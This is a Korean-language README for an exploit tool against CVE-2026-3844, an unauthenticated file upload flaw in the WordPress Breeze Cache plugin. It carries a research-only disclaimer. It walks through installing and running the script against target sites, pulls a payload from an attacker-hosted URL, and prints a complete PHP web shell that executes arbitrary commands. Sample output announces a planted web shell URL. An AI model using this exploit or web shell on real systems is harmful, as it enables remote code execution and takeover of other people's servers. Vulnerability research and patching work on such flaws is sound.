
WordPress - Breeze Cache <= 2.4.4 - 인증되지 않은 임의 파일 업로드
이 도구는 교육 및 보안 연구 목적으로만 제공됩니다.
승인되지 않은 컴퓨터 시스템 접근은 불법입니다. 이 도구는 소유한 시스템이나
명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 저자는 이 소프트웨어로 인한
오용 또는 손해에 대해 어떠한 책임도 지지 않습니다.
CVE-2026-3844는 WordPress용 Breeze Cache 플러그인(버전 ≤ 2.4.4)의 심각한 인증 없는 임의 파일 업로드 취약점입니다. 이 플러그인은 댓글의 srcset 매개변수를 제대로 검증하지 않아, 원격 공격자가 악성 파일(웹셸 포함)을 서버에 업로드할 수 있습니다.
이 취약점은 Breeze의 Gravatar 캐싱 기능을 악용합니다. 원격 파일 URL이 포함된 특수하게 조작된 srcset 매개변수로 댓글이 게시되면, Breeze는 파일을 다운로드하여 다음 위치에 로컬로 저장합니다:
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]
전제 조건: Breeze 설정에서 "Host Files Locally - Gravatars" 옵션이 활성화되어 있어야 합니다.
# 저장소 클론
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# 의존성 설치
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# 악용 없이 대상이 취약한지 확인
python3 CVE-2026-3844.py -u http://target.com --check-only
# 사용자 정의 페이로드 URL 사용
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# 출력을 파일로 저장
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# 느린 대상에 대한 타임아웃 증가
python3 CVE-2026-3844.py -u http://target.com --timeout 30
| 인수 | 설명 |
|---|---|
-u, --url | 대상 URL (필수) |
-p, --payload | 원격 페이로드 URL |
--timeout | 요청 타임아웃(초) (기본값: 15) |
--check-only | 대상이 취약한지만 확인 |
-o, --output | 셸 URL을 파일로 저장 |
자체 웹셸(shell.php)을 생성하세요:
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
접근 가능한 곳에 호스팅한 후 다음을 사용하세요:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
이 익스플로잇은 업로드된 파일에서 검증 문자열 4356452d323032362d33383434 (hex 인코딩된 "CVE-2026-3844")를 자동으로 확인하여 성공적인 악용을 확인합니다.
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)
[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # Main exploit script
├── README.md # This file
└── LICENSE # MIT License
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.
이 도구가 유용하다면 GitHub에서 별표 ⭐를 눌러주세요!